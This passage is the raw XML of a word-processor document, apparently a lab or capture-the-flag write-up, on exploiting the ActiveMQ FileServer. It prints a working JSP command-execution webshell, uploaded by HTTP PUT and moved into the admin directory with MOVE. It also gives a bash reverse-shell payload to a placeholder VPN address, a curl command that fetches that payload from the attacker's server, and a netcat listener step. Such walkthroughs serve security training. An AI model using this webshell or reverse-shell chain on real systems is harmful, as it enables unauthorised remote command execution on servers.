    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">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413000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="54" name="image6.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image6.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="241300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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The FileServer service in ActiveMQ allows users to upload files to a specified directory via the HTTP PUT method.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.pzhl3z9vp7e" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">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First, upload a JSP webshell into the file server directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.6pxeej7pl54i" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3098800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="63" name="image13.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image13.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="594360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pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.4zr9lkrx3c9j" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.5rj2rdd5toc0" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Webshell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">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&lt;%@ page import="java.util.*,java.io.*"%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">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&lt;%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">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JSP_KIT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">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cmd.jsp = Command Execution (unix)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">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by: Unknown</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">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modified: 27/06/2003</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">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%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">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&lt;HTML&gt;&lt;BODY&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">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&lt;FORM METHOD="GET" NAME="myform" ACTION=""&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">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&lt;INPUT TYPE="text" NAME="cmd"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">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&lt;INPUT TYPE="submit" VALUE="Send"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">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&lt;/FORM&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">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&lt;pre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">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&lt;%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">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if (request.getParameter("cmd") != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:ind w:firstLine="720"/>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out.println("Command: " + request.getParameter("cmd") + "&lt;BR&gt;");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:ind w:firstLine="720"/>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Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:ind w:firstLine="720"/>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OutputStream os = p.getOutputStream();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:ind w:firstLine="720"/>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InputStream in = p.getInputStream();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:ind w:firstLine="720"/>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DataInputStream dis = new DataInputStream(in);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:ind w:firstLine="720"/>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String disr = dis.readLine();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:ind w:firstLine="720"/>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while ( disr != null ) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>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out.println(disr);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>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disr = dis.readLine();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:ind w:firstLine="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">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%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">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&lt;/pre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">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&lt;/BODY&gt;&lt;/HTML&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can find the absolute installation path by accessing → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/admin/test/systemProperties.jsp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">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984500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="47" name="image25.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image25.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2984500"/>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spacing w:after="240" w:before="240" w:lineRule="auto"/>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4B">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Next, use the MOVE method to move the webshell into the admin directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">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565400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60" name="image4.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image4.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="256540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Accessing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/admin/1.jsp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can see our webshell working perfectly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">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743200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55" name="image18.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image18.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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The next step will be to obtain a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> reverse shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, using curl to save our payload into </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp</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50">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.u77lcnxh5ipz" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">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#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">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/bin/bash -c "bash -i &gt;&amp; /dev/tcp/&lt;IP-VPN&gt;/443 0&gt;&amp;1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">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Python server to serve our payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>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55">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184400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67" name="image14.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image14.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2184400"/>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Now we will execute the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">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curl &lt;IP-VPN&gt;/shell.sh -o /tmp/shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">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501900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="50" name="image23.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image23.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2501900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we open a Netcat listener to receive the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">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425700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57" name="image26.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image26.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2425700"/>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Finally, we execute:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">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sh /tmp/shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">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687792"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="72" name="image27.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image27.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:srcRect b="38259" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
